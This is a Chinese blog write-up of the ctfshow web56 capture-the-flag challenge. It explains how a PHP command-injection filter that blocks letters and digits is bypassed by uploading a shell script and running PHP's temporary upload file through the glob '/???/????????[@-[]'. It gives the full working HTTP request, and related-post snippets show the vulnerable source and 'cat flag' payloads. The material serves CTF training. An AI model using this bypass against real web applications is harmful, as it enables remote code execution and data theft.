ctfshow-web入门56(再次理解无数字字母rce)

最新推荐文章于 2024-05-13 18:37:04 发布
最新推荐文章于 2024-05-13 18:37:04 发布
阅读量1.6k 收藏 4
点赞数
分类专栏: # 各平台题目 文章标签: rce ctf
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/109152405
版权

前言

之前做过一道红包题第二弹,这里也是同样的解法,但是新学到了很多知识点,记录一下。

这个解法,p神的文章讲的很清楚无字母数字webshell之提高篇

文章目录

glob通配符

因为只有PHP生成的临时文件包含大写字母,所以可以用/???/????????[@-[]来匹配我们上传的临时文件。

原理:
翻开ascii码表,可见大写字母位于@与[之间:
在这里插入图片描述
那么,我们可以利用[@-[]来表示大写字母:在这里插入图片描述

. 执行文件不需要x权限

在这里插入图片描述

题解

注意传参方式为POST。
在这里插入图片描述

POST /?c=.+/???/????????[@-[] HTTP/1.1
Host: e51e3381-cae6-4dae-b44b-3a3ef9fa1c0d.chall.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------10242300956292313528205888
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: UM_distinctid=1739f845e394-0cffbf96840b0c8-4c302d7c-144000-1739f845e3b4e2
Upgrade-Insecure-Requests: 1
Content-Length: 239

-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/sh

cat flag.php
-----------------------------10242300956292313528205888--
天问_Herbert555
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 命令执行 web56
Kradress的博客
12-07 970
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET[
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
字母数字的命令执行(ctfshow web入门 56)
Firebasky的博客
09-12 2910
前面的一篇文章和这道题一样的做法 无字母数字的命令执行(ctfshow web入门 55) 需要注意的是:每次上传的文件不一定有大写的文件名,需要多上传几次
【网络安全】RCE漏洞讲解、绕过方式及实例介绍
最新发布
等风来
05-13 900
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
CTFshow web入门---web56
qq_53099119的博客
11-13 1361
在P神文章中>深入理解glob通配符
CTFshow web入门 56
li_n_k的博客
11-15 408
零基础小白
CTFshow web56 57 58 59 60-65
ChenD的学习笔记
11-12 911
CTFshow web56 web57 web58 web59 web60 web61 web62 web63 web64 web65
字母数字rce(ctfshow web入门56)
L1ni01
11-01 3490
字母数字rce(ctfshow web入门56) 我们根据这一题直接进入主题 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } 过滤
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
CVE-2020-8813 Cacti v1.2.8 RCE.MD
04-13
CVE-2020-8813 Cacti v1.2.8 RCE
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 602
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval中的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
ctfshow web入门命令执行部分(更新至56)
L1ni01
10-16 3087
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
ctfshow-web入门55和56
m0_73303597的博客
01-01 374
自用
ctfshow web入门55,56
xiaolong22333的博客
11-03 1429
最近在做这系列的题,这两题又学到了新姿势,赶紧记录一下 web55 <?php // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } 过滤了字母,不过通配符?和数字没有过滤,可以用bin
ctf.show web入门(命令执行)29~56
qq_61768489的博客
01-27 2966
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } preg_match()函数学习一下: preg_match函数是进行正则表达式的匹配,成功返回1,否则返回0 在这个正则里边有一个参数是i,这个在正则
ctfshow 红包题第二弹(无数字字母无~^RCE
qq_44657899的博客
08-14 3510
颖奇L’Amore师傅wp 这道题啥也不会,总结下知识点吧。 文章目录0x01 PHP上传机制0x02 PHP命令执行0x03 通配符与无字母数组命令执行解题 0x01 PHP上传机制 php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下,这里为/tmp,而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能,我们只要上传了文件,该文件就会被上传到upload_tmp_dir配置的目录下,上传完后会被删除。 这里本地实验了一下,的确如此,我使用的是wi
【Web】无字母/数字/参RCE相关例题wp
uuzeray的博客
11-10 809
话说14号还有一场小比赛嘞,恰逢周末,好好整理一下贴出几篇文章一起学习。
ctfshow web rce
09-12
根据提供的引用内容来看,这是关于CTFShow网站的Web远程代码执行(RCE)的问题。根据引用中的数据包,我们可以看到一个POST请求的HTML表单,其中包含一个文件上传字段。而根据引用中的源代码,我们可以看到一个GET参数`c`被用于执行系统命令。最后,根据引用中的源代码,我们可以看到一个POST参数`a`被用于执行代码。 所以,CTFShow网站存在Web RCE漏洞,攻击者可以通过构造恶意的请求来执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值